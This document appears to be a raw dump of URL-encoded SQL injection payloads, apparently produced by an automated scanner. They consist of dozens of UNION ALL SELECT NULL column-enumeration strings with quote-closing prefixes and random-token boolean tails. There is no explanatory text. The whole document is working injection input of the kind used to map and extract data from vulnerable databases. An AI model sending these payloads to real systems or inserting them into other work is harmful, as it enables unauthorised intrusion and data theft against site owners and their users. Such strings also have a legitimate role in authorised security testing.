1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27TUNx%27%3D%27TUNx 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27rMND%27%3D%27rMND 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27lNgw%27%3D%27lNgw 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27kPvO%27%3D%27kPvO 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27lSGw%27%3D%27lSGw 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27smor%27%3D%27smor 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27Blbe%27%3D%27Blbe 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27FZPc%27%3D%27FZPc 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27AkQv%27%3D%27AkQv 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27tQWs%27%3D%27tQWs 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27ezfO%27%3D%27ezfO 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27CiLS%27%3D%27CiLS 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27XiuM%27%3D%27XiuM 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27rQXN%27%3D%27rQXN 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27uCnH%27%3D%27uCnH 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27hVJt%27%3D%27hVJt 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27MztS%27%3D%27MztS 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27AfuI%27%3D%27AfuI 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27eIbs%27%3D%27eIbs 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27nikO%27%3D%27nikO 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27Mpoo%27%3D%27Mpoo 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27OVph%27%3D%27OVph 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27QMgH%27%3D%27QMgH 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27GHtb%27%3D%27GHtb 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27FFSB%27%3D%27FFSB 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27rUly%27%3D%27rUly 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27LPsq%27%3D%27LPsq 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27zuiu%27%3D%27zuiu 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27YlJM%27%3D%27YlJM 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27gcbB%27%3D%27gcbB 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27jTCJ%27%20LIKE%20%27jTCJ 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27wzRA%27%20LIKE%20%27wzRA 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27ijbh%27%20LIKE%20%27ijbh 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27kdoN%27%20LIKE%20%27kdoN 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27rKYw%27%20LIKE%20%27rKYw 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27ylDp%27%20LIKE%20%27ylDp 